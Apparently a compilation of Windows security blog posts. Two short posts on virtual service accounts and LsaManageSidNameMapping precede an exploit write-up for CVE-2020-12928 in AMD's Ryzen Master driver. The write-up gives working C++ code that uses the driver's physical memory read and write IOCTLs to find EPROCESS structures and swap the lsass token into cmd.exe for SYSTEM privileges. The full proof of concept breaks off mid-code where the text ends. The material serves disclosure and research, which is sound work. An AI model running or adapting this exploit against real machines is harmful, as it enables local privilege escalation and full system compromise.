
Creating your own Virtual Service Accounts

By: tiraniddo
26 October 2020 at 23:54

Following on from the previous blog post, if you can't map arbitrary SIDs to names to make displaying capabilities nicer, what is the purpose of LsaManageSidNameMapping? The primary purpose is to facilitate the creation of Virtual Service Accounts.

A virtual service account allows you to create an access token where the user SID is a service SID, for example, NT SERVICE\TrustedInstaller. A virtual service account doesn't need to have a password configured, which makes it ideal for restricting services, rather than having to deal with the default service accounts and using WSH to lock them down or specifying a domain user with a password.

To create an access token for a virtual service account you can use LogonUserExEx and specify the undocumented (AFAIK) LOGON32_PROVIDER_VIRTUAL logon provider. You must have SeTcbPrivilege to create the token, and the SID of the account must have its first RID in the range 80 to 111 inclusive. Recall from the previous blog post this is exactly the same range that is covered by LsaManageSidNameMapping.
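
To make that concrete, here is a minimal native sketch of the call. LogonUserExEx isn't in the SDK headers, so the prototype below is the commonly reverse-engineered one; the LOGON32_PROVIDER_VIRTUAL value of 4 and the fact that the export can be resolved from advapi32.dll are assumptions. The example logs on the existing NT SERVICE\TrustedInstaller mapping and needs to run with SeTcbPrivilege.

#include <Windows.h>
#include <stdio.h>

// Assumed, reverse-engineered prototype: LogonUserExW plus an extra
// PTOKEN_GROUPS parameter for additional groups.
typedef BOOL (WINAPI *LogonUserExExW_t)(
    LPWSTR lpszUsername, LPWSTR lpszDomain, LPWSTR lpszPassword,
    DWORD dwLogonType, DWORD dwLogonProvider, PTOKEN_GROUPS pTokenGroups,
    PHANDLE phToken, PSID* ppLogonSid, PVOID* ppProfileBuffer,
    LPDWORD pdwProfileLength, PQUOTA_LIMITS pQuotaLimits);

// Assumed value of the undocumented logon provider.
#define LOGON32_PROVIDER_VIRTUAL 4

int main()
{
    // Assumption: the export is resolvable from advapi32.dll.
    LogonUserExExW_t pLogonUserExExW = (LogonUserExExW_t)GetProcAddress(
        LoadLibraryW(L"advapi32.dll"), "LogonUserExExW");
    if (!pLogonUserExExW) {
        printf("[!] Couldn't resolve LogonUserExExW\n");
        return 1;
    }

    wchar_t user[] = L"TrustedInstaller";
    wchar_t domain[] = L"NT SERVICE";
    HANDLE hToken = NULL;

    // The caller must hold (and have enabled) SeTcbPrivilege.
    if (!pLogonUserExExW(user, domain, NULL, LOGON32_LOGON_SERVICE,
            LOGON32_PROVIDER_VIRTUAL, NULL, &hToken,
            NULL, NULL, NULL, NULL)) {
        printf("[!] Logon failed: %lu\n", GetLastError());
        return 1;
    }
    printf("[>] Got a virtual service account token: %p\n", hToken);
    CloseHandle(hToken);
    return 0;
}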

The LogonUserExEx API only takes strings for the domain and username; you can't specify a SID. Using the LsaManageSidNameMapping function allows you to map a username and domain to a virtual service account SID. LSASS prevents you from using RID 80 (NT SERVICE) and 87 (NT TASK) outside of the SCM or the task scheduler service (see this snippet of reversed LSASS code for how it checks). However, everything else in the RID range is fair game.

So let's create our own virtual service account. First, you need to add your domain and username using the tool from the previous blog post. All these commands need to be run as a user with SeTcbPrivilege.

SetSidMapping.exe S-1-5-100="AWESOME DOMAIN" 
SetSidMapping.exe S-1-5-100-1="AWESOME DOMAIN\USER"

So we now have the AWESOME DOMAIN\USER account with the SID S-1-5-100-1. Now, before we can log on the account, we need to grant it a logon right. This is normally SeServiceLogonRight if you want a service account, but you can specify any logon right you like, even SeInteractiveLogonRight (sadly I don't believe you can actually log in interactively with your virtual account, at least not easily).

If you get the latest version of NtObjectManager (from GitHub at the time of writing) you can use the Add-NtAccountRight command to grant the logon right.

PS> Add-NtAccountRight -Sid 'S-1-5-100-1' -LogonType SeInteractiveLogonRight

Once granted a logon right you can use the Get-NtToken command to logon the account and return a token.

PS> $token = Get-NtToken -Logon -LogonType Interactive -User USER -Domain 'AWESOME DOMAIN' -LogonProvider Virtual
PS> Format-NtToken $token
AWESOME DOMAIN\USER

As you can see we've authenticated the virtual account and got back a token. As we chose an interactive logon type, the token will also have the INTERACTIVE group assigned. Anyway, that's all for now. I guess as there's only a limited number of RIDs available (which is an artificial restriction) MS doesn't want to document these features, even though they could be useful to normal developers.



Using LsaManageSidNameMapping to add a name to a SID.

By: tiraniddo
24 October 2020 at 23:23

I was digging into exactly how service SIDs are mapped back to a name when I came across the API LsaLookupManageSidNameMapping. Unsurprisingly this API is not officially documented either on MSDN or in the Windows SDK. However, LsaManageSidNameMapping is documented (mostly). Turns out that after a little digging they lead to the same RPC function in LSASS, just through different names:

LsaLookupManageSidNameMapping -> lsass!LsaLookuprManageCache

and

LsaManageSidNameMapping -> lsasrv!LsarManageSidNameMapping

They ultimately both end up in lsasrv!LsarManageSidNameMapping. I've no idea why there are two of them and why one is documented but the other isn't. *shrug*. Of course, even though there's an MSDN entry for the function, it doesn't seem to actually be documented in the Ntsecapi.h include file *double shrug*. The best documentation I found was this header file.
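
To give a flavour of what that header describes, here's a rough sketch of the definitions and a call that registers a name for the S-1-5-100 domain. The structure layouts are my reading of the publicly available header and the exporting DLL (advapi32.dll below) is an assumption, so treat this as a sketch rather than a reference; it also needs to run with SeTcbPrivilege.

#include <Windows.h>
#include <ntsecapi.h>
#include <string.h>
#include <stdio.h>

// Rough definitions as read from the publicly available header (assumption).
typedef enum _LSA_SID_NAME_MAPPING_OPERATION_TYPE {
    LsaSidNameMappingOperation_Add = 0,
    LsaSidNameMappingOperation_Remove,
    LsaSidNameMappingOperation_AddMultiple
} LSA_SID_NAME_MAPPING_OPERATION_TYPE;

typedef struct _LSA_SID_NAME_MAPPING_OPERATION_ADD_INPUT {
    LSA_UNICODE_STRING DomainName;
    LSA_UNICODE_STRING AccountName; // leave empty to register just the domain
    PSID Sid;
    ULONG Flags;
} LSA_SID_NAME_MAPPING_OPERATION_ADD_INPUT;

// The real API takes unions of operation inputs/outputs; only the Add
// variant is sketched here, so PVOID is used for brevity.
typedef NTSTATUS (NTAPI *LsaManageSidNameMapping_t)(
    LSA_SID_NAME_MAPPING_OPERATION_TYPE OpType,
    PVOID OpInput,
    PVOID *OpOutput);

int main()
{
    // Assumption: the export lives in advapi32.dll. Caller needs SeTcbPrivilege.
    LsaManageSidNameMapping_t pLsaManageSidNameMapping =
        (LsaManageSidNameMapping_t)GetProcAddress(
            LoadLibraryW(L"advapi32.dll"), "LsaManageSidNameMapping");
    if (!pLsaManageSidNameMapping) {
        printf("[!] Couldn't resolve LsaManageSidNameMapping\n");
        return 1;
    }

    // Build S-1-5-100, i.e. an NT authority SID with its first RID in the
    // 80-111 range.
    SID_IDENTIFIER_AUTHORITY nt_auth = SECURITY_NT_AUTHORITY;
    PSID domain_sid = NULL;
    AllocateAndInitializeSid(&nt_auth, 1, 100, 0, 0, 0, 0, 0, 0, 0, &domain_sid);

    wchar_t domain_name[] = L"AWESOME DOMAIN";
    LSA_SID_NAME_MAPPING_OPERATION_ADD_INPUT input = { 0 };
    input.DomainName.Buffer = domain_name;
    input.DomainName.Length = (USHORT)(wcslen(domain_name) * sizeof(wchar_t));
    input.DomainName.MaximumLength = input.DomainName.Length;
    input.Sid = domain_sid;

    PVOID output = NULL;
    NTSTATUS status = pLsaManageSidNameMapping(
        LsaSidNameMappingOperation_Add, &input, &output);
    printf("[>] LsaManageSidNameMapping returned 0x%08X\n", (unsigned int)status);

    // Assumption: the output buffer is LSA-allocated and freed this way.
    if (output) LsaFreeMemory(output);
    FreeSid(domain_sid);
    return 0;
}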

This got me wondering if I could map all the AppContainer named capabilities via LSASS so that normal applications would resolve them rather than having to do it myself. This would be easier than modifying the SAM or similar tricks. Sadly, while you can add some SID-to-name mappings, this API won't let you do that for capability SIDs, as there are the following calling restrictions:

  1. The caller needs SeTcbPrivilege (this is a given with an LSA API).
  2. The SID to map must be in the NT security authority (5) and the domain's first RID must be between 80 and 111 inclusive.
  3. You must register a name for a domain SID before you can register any SID within that domain.
Basically restriction 2 stops us adding a sub-domain SID for a capability, as capability SIDs use the package security authority (15), and we can't just go straight to adding the SID-to-name mapping as we need to have registered the domain with the API first; it's not enough that the domain exists. Maybe there's some other easy way to do it, but this isn't it.

Instead I've just put together a .NET tool to add or remove your own SID-to-name mappings. It's up on GitHub. The mappings are ephemeral, so if you break something rebooting should fix it :-)


CVE-2020-12928 Exploit Proof-of-Concept, Privilege Escalation in AMD Ryzen Master AMDRyzenMasterDriver.sys

By: h0mbre
13 October 2020 at 04:00

Background

Earlier this year I was really focused on Windows exploit development and was working through the FuzzySecurity exploit development tutorials on the HackSysExtremeVulnerableDriver to try and learn and eventually went bug hunting on my own.

I ended up discovering what could be described as a logic bug in the ATI Technologies Inc. driver ‘atillk64.sys’. Being new to the Windows driver bug hunting space, I didn’t realize that this driver had already been analyzed and classified as vulnerable by Jesse Michael and his colleague Mickey in their ‘Screwed Drivers’ GitHub repo. It had also been mentioned in several other places that have been pointed out to me since.

So I didn’t really feel like I had discovered my first real bug, and decided to keep hunting for similar bugs in Windows 3rd-party drivers until I found my own in the AMD Ryzen Master AMDRyzenMasterDriver.sys version 15.

I have since stopped looking for these types of bugs as I believe they wouldn’t really help me progress skills-wise, and my goals have changed since then.

Thanks

Huge thanks to the following people for being so charitable, publishing things, messaging me back, encouraging me, and helping me along the way:

AMD Ryzen Master

The AMD Ryzen Master Utility is a tool for CPU overclocking. The software purportedly supports a growing list of processors and allows users fine-grained control over the performance settings of their CPU. You can read about it here.

AMD has published an advisory on their Product Security page for this vulnerability.

Vulnerability Analysis Overview

This vulnerability is extremely similar to my last Windows driver post, so please give that a once-over if this one lacks any depth and leaves you curious. I will try my best to limit the redundancy with the previous post.

All of my analysis was performed on Windows 10 Build 18362.19h1_release.190318-1202.

I picked this driver as a target because it is common for 3rd-party Windows drivers responsible for hardware configuration or diagnostics to expose powerful routines that directly read from or write to physical memory to low-privileged users.

Checking Permissions

The first thing I did after installing AMD Ryzen Master using the default installer was to locate the driver in OSR’s Device Tree utility and check its permissions. This is the first thing I was checking during this period because I had read that Microsoft did not consider a violation of the security boundary between Administrator and SYSTEM to be a serious violation. I wanted to ensure that my targets were all accessible from lower privileged users and groups.

Luckily for me, Device Tree indicated that all Authenticated Users were allowed to read and modify the driver.

Finding Interesting IOCTL Routines

Write What Where Routine

Next, I started looking at the driver in a free version of IDA. A search for MmMapIoSpace returned quite a few places in which the API was cross-referenced. I just began going down the list to see what code paths could reach these calls.

The first result, sub_140007278, looked very interesting to me.

We don’t know at this point if we control the API parameters in this routine, but looking at the routine statically we can see that we make our call to MmMapIoSpace, store the returned pointer value in [rsp+48h+BaseAddress], and do a check to make sure the return value was not NULL. If we have a valid pointer, we then progress into the loop routine on the bottom left.

At the start of the looping routine, we can see that eax gets the value of dword ptr [rsp+48h+NumberOfBytes] and then we compare eax to [rsp+48h+var_24]. This makes some sense because we already know from looking at the API call that [rsp+48h+NumberOfBytes] held the NumberOfBytes parameter for MmMapIoSpace. So essentially what this looks like is a check to see if a counter variable has reached our NumberOfBytes value. A quick highlight of eax shows that later it takes on the value of [rsp+48h+var_24], is incremented, and then eax is put back into [rsp+48h+var_24]. Then we’re back at the top of our loop where eax is set equal to NumberOfBytes before every check.

So this looked interesting to me: we can see that we’re doing something in a loop, byte by byte, until our NumberOfBytes value is reached. Once that value is reached, the other branch of the loop is taken, which is a call to MmUnmapIoSpace.

Looking a bit closer at the loop, we can see a few interesting things. ecx is essentially a counter here as it's set equal to our already mentioned counters eax and [rsp+48h+var_24]. We also see there is a mov to [rdx+rcx] from al. A single byte is written to the location of rdx + rcx. So we can make a guess that rdx is a base address and rcx is an offset. This is what a traditional for loop would seem to look like disassembled. al is taken from another similar construction in [r8+rax] where rax is now acting as the offset and r8 is a different base address.

So all in all, I decided this looks like a routine that is most likely doing either a byte-by-byte read or a byte-by-byte write to kernel memory. But if you look closely, you can see that the pointer returned from MmMapIoSpace is the one that al is written to (while tracking an offset), because it is eventually moved into rdx for the mov [rdx+rcx], al operation. This was exciting for me because if we can control the parameters of MmMapIoSpace, we will possibly be able to specify a physical memory address and offset and copy a user-controlled buffer into that space once it is mapped into our process space. This is essentially a write what where primitive!
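
To summarize the analysis, here is roughly what the routine appears to boil down to. This is my reconstruction from the disassembly, not the driver's source; the function and variable names are mine, and the cache type is an assumption since we don't control it.

#include <ntddk.h>

// Approximate reconstruction of sub_140007278 (kernel-mode pseudocode, not
// the driver's actual source): map a physical address, then copy a
// caller-supplied buffer into the mapping one byte at a time.
VOID CopyBufferToPhysical(PHYSICAL_ADDRESS PhysicalAddress,
                          ULONG NumberOfBytes,
                          PUCHAR UserBuffer)
{
    // The driver fixes the CacheType itself; MmNonCached is an assumption.
    PUCHAR Mapped = (PUCHAR)MmMapIoSpace(PhysicalAddress, NumberOfBytes, MmNonCached);
    if (Mapped != NULL) {
        for (ULONG i = 0; i < NumberOfBytes; i++) {
            Mapped[i] = UserBuffer[i];  // the 'mov [rdx+rcx], al' in the loop
        }
        MmUnmapIoSpace(Mapped, NumberOfBytes);
    }
}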

Looking at the first cross-reference to this routine, I started working my way back up the call graph until I was able to locate a probable IOCTL code.

After banging my head against my desk for hours trying to pass all of the checks to reach our glorious write what where routine, I was finally able to reach it and get a reliable BSOD. The checks were looking at the sizes of my input and output buffers supplied to my DeviceIoControl call. I was able to solve this by simply stringing together random length buffers of something like AAAAAAAABBBBBBBBCCCCCCCC etc, and seeing how the program would parse my input. Eventually I was able to figure out that the input buffer was structured as follows:

  • first 8 bytes of my input buffer would be the desired physical address you want mapped,
  • the next 4 bytes would represent the NumberOfBytes parameter,
  • and finally, and this is what took me the longest, the next 8 bytes were to be a pointer to the buffer you wanted to overwrite the mapped kernel memory with.

Very cool! We have control over all the MmMapIoSpace params except CacheType and we can specify what buffer to copy over!

This is progress, I was fairly certain at this point I had a write primitive; however, I wasn’t exactly sure what to do with it. At this point, I reasoned that if a routine existed to do a byte by byte write to a kernel buffer somewhere, I probably also had the ability to do a byte by byte read of a kernel buffer. So I set out to find my routine’s sibling, the read what where routine (if she existed).

Read What Where

Now I went back to the other cross references of MmMapIoSpace calls and eventually came upon this routine, sub_1400063D0.

You’d be forgiven for thinking it looks just like the last routine we analyzed; I know I did and missed it initially. However, this routine differs in one major way. Instead of copying byte by byte out of our process space buffer and into a kernel buffer, we are copying byte by byte out of a kernel buffer and into our process space buffer. I will spare you the technical analysis here, but it is essentially our other routine with the source and destination reversed! This is our read what where primitive and I was able to back track a cross reference in IDA to this IOCTL.

There were a lot of rabbit holes here to go down but eventually this one ended up being straightforward once I found a clear cut code path to the routine from the IOCTL call graph.

Once again, we control the important MmMapIoSpace parameters and, unlike the other IOCTL, the byte-by-byte transfer occurs in our DeviceIoControl output buffer argument at an offset of 0xC bytes. So we can tell the driver to read physical memory from an arbitrary address, for an arbitrary length, and send us the results!
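
Before moving on, here is a trimmed usage sketch of the read primitive, distilled from the full PoC at the end of this post (the IOCTL code, device name, and buffer layout all come from there); it reads one page of physical memory and prints the first byte.

#include <Windows.h>
#include <stdio.h>

// Same input layout the full PoC uses: 8-byte physical address, 4-byte
// length, then room the driver expects in the buffer.
typedef struct {
    INT64 start_address;
    DWORD num_of_bytes;
    char  receiving_buff[0x1000];
} READ_INPUT_BUFFER;

int main()
{
    HANDLE hFile = CreateFileA("\\\\.\\AMDRyzenMasterDriverV15",
        GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL, OPEN_EXISTING, 0, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        printf("[!] Unable to open the device\n");
        return 1;
    }

    // Read one page of physical memory starting at 0x100000000.
    READ_INPUT_BUFFER input_buff = { 0x100000000, 0x1000 };
    static BYTE output_buff[0x100c] = { 0 };
    DWORD bytes_ret = 0;

    // The driver checks the I/O buffer sizes, so the 0x40 and 0x100c values
    // are kept from the PoC.
    if (DeviceIoControl(hFile, 0x81112F08, &input_buff, 0x40,
        output_buff, 0x100c, &bytes_ret, NULL))
    {
        // The first 0xc bytes of the output are metadata; the page contents
        // start at offset 0xc.
        printf("[>] First byte of the page: 0x%02X\n", output_buff[0xc]);
    }
    else {
        printf("[!] DeviceIoControl failed: %lu\n", GetLastError());
    }
    CloseHandle(hFile);
    return 0;
}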

With these two powerful primitives, I tried to recreate my previous exploitation strategy employed in my last post.

Exploitation

Here I will try to walk through some code snippets and explain my thinking. Apologies for any programming mistakes in this PoC code; however, it works reliably on all the testing I performed (and it worked well enough for AMD to patch the driver.)

First, we’ll need to understand what I’m fishing for here. As I explained in my previous post, I tried to employ the same strategy that @b33f did with his driver exploit and fish for "Proc" tags in the kernel pool memory. Please refer to that post for any questions here. The TL;DR here is that information about processes is stored in the EPROCESS structure in the kernel and some of the important members for our purposes are:

  • ImageFileName (this is the name of the process)
  • UniqueProcessId (the PID)
  • Token (this is a security token value)

The offsets from the beginning of the structure to these members were as follows on my build:

  • 0x2e8 to the UniqueProcessId
  • 0x360 to the Token
  • 0x450 to the ImageFileName

You can see the offsets in WinDBG:

kd> !process 0 0 lsass.exe
PROCESS ffffd48ca64e7180
    SessionId: 0  Cid: 0260    Peb: 63d241d000  ParentCid: 01f0
    DirBase: 1c299b002  ObjectTable: ffffe60f220f2580  HandleCount: 1155.
    Image: lsass.exe

kd> dt nt!_EPROCESS ffffd48ca64e7180 UniqueProcessId Token ImageFilename
   +0x2e8 UniqueProcessId : 0x00000000`00000260 Void
   +0x360 Token           : _EX_FAST_REF
   +0x450 ImageFileName   : [15]  "lsass.exe"

Each data structure in the kernel pool has various headers (thanks to ReWolf for breaking this down so well):

  • POOL_HEADER structure (this is where our "Proc" tag will reside),
  • OBJECT_HEADER_xxx_INFO structures,
  • OBJECT_HEADER which contains a Body where the EPROCESS structure lives.

As b33f explains in his write-up, all of the addresses where one begins looking for a "Proc" tag are 0x10 aligned, so every address here ends in a 0. We know that at some arbitrary address ending in 0, if we look at <address> + 0x4 that is where a "Proc" tag might be.

Leveraging Read What Where

The difficulty on my Windows build was that the distance from a "Proc" tag, once found, to the beginning of the EPROCESS structure (where I know the offsets to the members I want) varied wildly. So much so that, in order to get the exploit working reliably, I simply had to create my own data structure and store instances of it in a vector. The data structure was as follows:

struct PROC_DATA {
    std::vector<INT64> proc_address;
    std::vector<INT64> page_entry_offset;
    std::vector<INT64> header_size;
};

So as I’m using our Read What Where primitive to blow through all the RAM hunting for "Proc", if I find an instance of "Proc" I’ll iterate 0x10 bytes at a time until I find a marker signifying the end of our pool headers and the beginning of EPROCESS. This marker was 0x00B80003. So now I’ll store the page-aligned address of the page holding the "Proc" chunk in PROC_DATA.proc_address, annotate how far into that page the chunk sits (its offset from the nearest multiple of 0x1000) in PROC_DATA.page_entry_offset, and annotate how far it was from "Proc" until we reached our marker, i.e. the beginning of EPROCESS, in PROC_DATA.header_size. These will all be stored in a vector.

You can see this routine here:

INT64 results_begin = ((INT64)output_buff + 0xc);
        for (INT64 i = 0; i < 0xF60; i = i + 0x10) {

            PINT64 proc_ptr = (PINT64)(results_begin + 0x4 + i);
            INT32 proc_val = *(PINT32)proc_ptr;

            if (proc_val == 0x636f7250) {

                for (INT64 x = 0; x < 0xA0; x = x + 0x10) {

                    PINT64 header_ptr = PINT64(results_begin + i + x);
                    INT32 header_val = *(PINT32)header_ptr;

                    if (header_val == 0x00B80003) {

                        proc_count++;
                        cout << "\r[>] Proc chunks found: " << dec <<
                            proc_count << flush;

                        INT64 temp_addr = input_buff.start_address + i;

                        // This address might not be page-aligned to 0x1000
                        // so find out how far off from a multiple of 
                        // 0x1000 we are. This value is stored in our 
                        // PROC_DATA struct in the page_entry_offset
                        // member.
                        INT64 modulus = temp_addr % 0x1000;
                        proc_data.page_entry_offset.push_back(modulus);

                        // This is the page-aligned address where, either
                        // small or large paged memory will hold our "Proc"
                        // chunk. We store this as our proc_address member
                        // in PROC_DATA.
                        INT64 page_address = temp_addr - modulus;
                        proc_data.proc_address.push_back(
                            page_address);
                        proc_data.header_size.push_back(x);
                    }
                }
            }
        }

It will be more obvious with the entire exploit code, but what I’m doing here is basically starting from a physical address and calling our read what where in a loop with a read size of 0x100c (0x1000 + 0xc, as required so we can capture a whole page of memory and still keep the returned metadata that starts at offset 0xc in our output buffer), all the while adding the discovered PROC_DATA entries to our vectors. Once we hit our max address or max iterations, we’ll send this data over to a second routine that parses out the EPROCESS members we care about.

It is important to note that I took great care to make sure that all calls to MmMapIoSpace used page-aligned physical addresses, as this is the most stable way to call the API.

Now that I knew exactly how many "Proc" chunks I had found and stored all their relevant metadata in a vector, I could start a second routine that would use that metadata to check for their EPROCESS member values to see if they were processes I cared about.

My strategy here was to find the EPROCESS members for a privileged process such as lsass.exe and swap its security token with the security token of a cmd.exe process that I owned. You can see a portion of that code here:

INT64 results_begin = ((INT64)output_buff + 0xc);

        INT64 imagename_address = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x450; //ImageFileName
        INT64 imagename_value = *(PINT64)imagename_address;

        INT64 proc_token_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x360; //Token
        INT64 proc_token = *(PINT64)proc_token_addr;

        INT64 pid_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x2e8; //UniqueProcessId
        INT64 pid_value = *(PINT64)pid_addr;

        int sys_result = count(SYSTEM_procs.begin(), SYSTEM_procs.end(),
            imagename_value);

        if (sys_result != 0) {

            system_token_count++;
            system_tokens.token_name.push_back(imagename_value);
            system_tokens.token_value.push_back(proc_token);
        }

        if (imagename_value == 0x6578652e646d63) {
            //cout << "[>] cmd.exe found!\n";
            cmd_token_address = (start_address + proc_data.header_size[i] +
                proc_data.page_entry_offset[i] + 0x360);
        }
    }

    if (system_tokens.token_name.size() != 0 and cmd_token_address != 0) {
        cout << "\n[>] cmd.exe and SYSTEM token information found!\n";
        cout << "[>] Let's swap tokens!\n";
    }
    else if (cmd_token_address == 0) {
        cout << "[!] No cmd.exe token address found, exiting...\n";
        exit(1);
    }

So now at this point I had the location and values of everything I cared about and it was time to leverage the Write What Where routine we had found.

Leveraging Write What Where

The problem I was facing was that I needed my calls to MmMapIoSpace to be page-aligned so that the calls remain stable and we don’t get any unnecessary BSODs.

So let’s picture a page of memory as a line.

<-----------------MEMORY PAGE----------------->

We can only write in page-size chunks; however, the value we want to overwrite, the value of the cmd.exe process’s Token, is most-likely not page-aligned. So now we have this:

<---------TOKEN------------------------------->

I could do a direct write at the exact address of this Token value, but my call to MmMapIoSpace would not be page-aligned.

So what I did was make one more Read What Where call to store everything on that page of memory in a buffer, overwrite the cmd.exe Token in that buffer with the lsass.exe Token, and then use that buffer in my call to the Write What Where routine.

So instead of an 8-byte write to simply overwrite the value, I’d be opting to completely overwrite that entire page of memory while only changing 8 bytes; that way the calls to MmMapIoSpace stay clean.

You can see some of that math in the code snippet below with references to modulus. Remember that the Write What Where utilized the input buffer of DeviceIoControl as the buffer it would copy over into the kernel memory:

if (!DeviceIoControl(
        hFile,
        READ_IOCTL,
        &input_buff,
        0x40,
        output_buff,
        modulus + 0xc,
        &bytes_ret,
        NULL))
    {
        cout << "[!] Failed the read operation to copy the cmd.exe page...\n";
        cout << "[!] Last error: " << hex << GetLastError() << "\n";
        exit(1);
    }

    PBYTE results = (PBYTE)((INT64)output_buff + 0xc);

    PBYTE cmd_page_buff = (PBYTE)VirtualAlloc(
        NULL,
        modulus + 0x8,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);
   

    DWORD num_of_bytes = modulus + 0x8;

    INT64 start_address = cmd_token_address;
    cout << "[>] cmd.exe token located at: " << hex << start_address << "\n";
    INT64 new_token_val = system_tokens.token_value[0];
    cout << "[>] Overwriting token with value: " << hex << new_token_val << "\n";

    memcpy(cmd_page_buff, results, modulus);
    memcpy(cmd_page_buff + modulus, (void*)&new_token_val, 0x8);

    // PhysicalAddress
    // NumberOfBytes
    // Buffer to be copied into system space
    BYTE input[0x1000] = { 0 };
    memcpy(input, (void*)&cmd_page, 0x8);
    memcpy(input + 0x8, (void*)&num_of_bytes, 0x4);
    memcpy(input + 0xc, cmd_page_buff, modulus + 0x8);

    if (DeviceIoControl(
        hFile,
        WRITE_IOCTL,
        input,
        modulus + 0x8 + 0xc,
        NULL,
        0,
        &bytes_ret,
        NULL))
    {
        cout << "[>] Write operation succeeded, you should be nt authority/system\n";
    }
    else {
        cout << "[!] Write operation failed, exiting...\n";
        exit(1);
    }

Final Results

You can see the mandatory full exploit screenshot below:

Disclosure Timeline

Big thanks to Tod Beardsley at Rapid7 for his help with the disclosure process!

  • 1 May 2020: Vendor notified of vulnerability
  • 1 May 2020: Vendor acknowledges vulnerability
  • 18 May 2020: Vendor supplies patch, restricting driver access to Administrator group
  • 18 May 2020 - 11 July 2020: Back and forth about CVE assignment
  • 23 Aug 2020: CVE-2020-12928 assigned
  • 13 Oct 2020: Joint Disclosure

Exploit Proof of Concept

#include <iostream>
#include <vector>
#include <algorithm>
#include <chrono>
#include <ctime>
#include <iomanip>
#include <Windows.h>
using namespace std;

#define DEVICE_NAME         "\\\\.\\AMDRyzenMasterDriverV15"
#define WRITE_IOCTL         (DWORD)0x81112F0C
#define READ_IOCTL          (DWORD)0x81112F08
#define START_ADDRESS       (INT64)0x100000000
#define STOP_ADDRESS        (INT64)0x240000000

// Creating vector of hex representation of ImageFileNames of common 
// SYSTEM processes, eg. 'wlms.exe' = hex('exe.smlw')
vector<INT64> SYSTEM_procs = {
    //0x78652e7373727363,         // csrss.exe
    0x78652e737361736c,         // lsass.exe
    //0x6578652e73736d73,         // smss.exe
    //0x7365636976726573,         // services.exe
    //0x6b6f72426d726753,         // SgrmBroker.exe
    //0x2e76736c6f6f7073,         // spoolsv.exe
    //0x6e6f676f6c6e6977,         // winlogon.exe
    //0x2e74696e696e6977,         // wininit.exe
    //0x6578652e736d6c77,         // wlms.exe
};

typedef struct {
    INT64 start_address;
    DWORD num_of_bytes;
    PBYTE write_buff;
} WRITE_INPUT_BUFFER;

typedef struct {
    INT64 start_address;
    DWORD num_of_bytes;
    char receiving_buff[0x1000];
} READ_INPUT_BUFFER;

// This struct will hold the address of a "Proc" tag's page entry, 
// that Proc chunk's header size, and how far into the page the "Proc" tag is
struct PROC_DATA {
    std::vector<INT64> proc_address;
    std::vector<INT64> page_entry_offset;
    std::vector<INT64> header_size;
};

struct SYSTEM_TOKENS {
    std::vector<INT64> token_name;
    std::vector<INT64> token_value;
} system_tokens;

INT64 cmd_token_address = 0;

HANDLE grab_handle(const char* device_name) {

    HANDLE hFile = CreateFileA(
        device_name,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        0,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE)
    {
        cout << "[!] Unable to grab handle to " << DEVICE_NAME << "\n";
        exit(1);
    }
    else
    {
        cout << "[>] Grabbed handle 0x" << hex
            << (INT64)hFile << "\n";

        return hFile;
    }
}

PROC_DATA read_mem(HANDLE hFile) {

    cout << "[>] Reading through RAM for Proc tags...\n";
    DWORD num_of_bytes = 0x1000;

    LPVOID output_buff = VirtualAlloc(NULL,
        0x100c,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    PROC_DATA proc_data;

    int proc_count = 0;
    INT64 iteration = 0;
    while (true) {

        INT64 start_address = START_ADDRESS + (0x1000 * iteration);
        if (start_address >= 0x240000000) {
            cout << "\n[>] Max address reached.\n";
            cout << "[>] Number of iterations: " << dec << iteration << "\n";
            return proc_data;
        }

        READ_INPUT_BUFFER input_buff = { start_address, num_of_bytes };

        DWORD bytes_ret = 0;

        //cout << "[>] User buffer allocated at: 0x" << hex << output_buff << "\n";
        //Sleep(500);

        if (DeviceIoControl(
            hFile,
            READ_IOCTL,
            &input_buff,
            0x40,
            output_buff,
            0x100c,
            &bytes_ret,
            NULL))
        {
            //cout << "[>] DeviceIoControl succeeded!\n";
        }

        iteration++;

        //DebugBreak();
        INT64 results_begin = ((INT64)output_buff + 0xc);
        for (INT64 i = 0; i < 0xF60; i = i + 0x10) {

            PINT64 proc_ptr = (PINT64)(results_begin + 0x4 + i);
            INT32 proc_val = *(PINT32)proc_ptr;

            if (proc_val == 0x636f7250) {

                for (INT64 x = 0; x < 0xA0; x = x + 0x10) {

                    PINT64 header_ptr = PINT64(results_begin + i + x);
                    INT32 header_val = *(PINT32)header_ptr;

                    if (header_val == 0x00B80003) {

                        proc_count++;
                        cout << "\r[>] Proc chunks found: " << dec <<
                            proc_count << flush;

                        INT64 temp_addr = input_buff.start_address + i;

                        // This address might not be page-aligned to 0x1000
                        // so find out how far off from a multiple of 
                        // 0x1000 we are. This value is stored in our 
                        // PROC_DATA struct in the page_entry_offset
                        // member.
                        INT64 modulus = temp_addr % 0x1000;
                        proc_data.page_entry_offset.push_back(modulus);

                        // This is the page-aligned address where, either
                        // small or large paged memory will hold our "Proc"
                        // chunk. We store this as our proc_address member
                        // in PROC_DATA.
                        INT64 page_address = temp_addr - modulus;
                        proc_data.proc_address.push_back(
                            page_address);
                        proc_data.header_size.push_back(x);
                    }
                }
            }
        }
    }
}

void parse_procs(PROC_DATA proc_data, HANDLE hFile) {

    int system_token_count = 0;
    DWORD bytes_ret = 0;
    DWORD num_of_bytes = 0x1000;

    LPVOID output_buff = VirtualAlloc(
        NULL,
        0x100c,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    for (int i = 0; i < proc_data.header_size.size(); i++) {

        INT64 start_address = proc_data.proc_address[i];
        READ_INPUT_BUFFER input_buff = { start_address, num_of_bytes };

        if (DeviceIoControl(
            hFile,
            READ_IOCTL,
            &input_buff,
            0x40,
            output_buff,
            0x100c,
            &bytes_ret,
            NULL))
        {
            //cout << "[>] DeviceIoControl succeeded!\n";
        }

        INT64 results_begin = ((INT64)output_buff + 0xc);

        INT64 imagename_address = results_begin +
